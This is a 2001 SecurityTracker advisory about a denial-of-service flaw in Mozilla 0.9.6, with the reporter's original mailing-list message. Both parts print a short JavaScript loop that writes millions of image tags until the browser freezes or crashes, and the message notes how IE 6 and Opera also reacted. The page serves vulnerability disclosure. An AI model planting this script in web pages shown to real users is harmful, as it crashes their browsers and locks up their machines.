SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Report a Bug
Report a vulnerability that you have found to SecurityTracker
Questions?
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (Web Browser)  >  Mozilla Browser Vendors:  Mozilla.org
Mozilla Web Browser Can Be Crashed By Malicious Image Source Tag Javascript Supplied By Remote Users
Date:  Dec 22 2001
Impact:  Denial of service via network
Exploit Included:  Yes  
Version(s): Mozilla 0.9.6 (build 2001112009)
Description:  A denial of service vulnerability was reported in the Mozilla browser. A remote user can create Javascript that will cause the browser to consume nearly all CPU resources and then crash.

It is reported that the following code may be used to cause the browser to crash:

<script>
for(i=0;i<100000000;i++) {
document.write("<img src=http://fakehost.com/"+i+".gif>");
}
</script>

It is reported that this will trigger a large memory leak (bigger than 1Mb per second).
Impact:  A remote user can cause the browser to consume nearly all CPU resources and then crash.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.mozilla.org/ (Links to External Site)
Cause:  Resource error
Underlying OS:  BeOS, Linux (Any), MacOS, UNIX (Any), Windows (Any)
Underlying OS Comments:  Tested on Windows 2000; other operating systems may or may not be affected
Reported By:  Pavel Titov <Pavel.Titov@mtu-net.ru>
Message History:   None.

 Source Message Contents
Date:  Tue, 11 Dec 2001 19:57:11 +0300
From:  Pavel Titov <Pavel.Titov@mtu-net.ru>
Subject:  Browsers fails on big image count

 

Code

<script>
for(i=0;i<100000000;i++) {
   document.write("<img src=http://fakehost.com/"+i+".gif>");
 
</script>

Browser reaction

IE 6 (build 2600) @ Win2K - after long time with ~50% CPU utilization 
and very high disk utilization asks about stopping script. Small memory 
leak (few Mb per minute).
IE 6 (build 2600) @ Win98 - freezes, other IE windows renders very long,
terminating task causes computer lockup.
Mozilla 0.9.6 (build 2001112009) @ Win2K - freezes, ~98% CPU utilization 
and big memory leak (bigger than 1Mb per second).
Opera 5.11 (build 094d) @ Win2K - not freezes, responds, but not very 
fast. Big CPU utilization and very small memory leak (few hundreth 
kilobytes per minute).

-- 
Pavel Titov
Homepage: http://www.titov.pp.ru/
Home gopherspace: gopher://paveltitov.virtualave.net:7070/


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC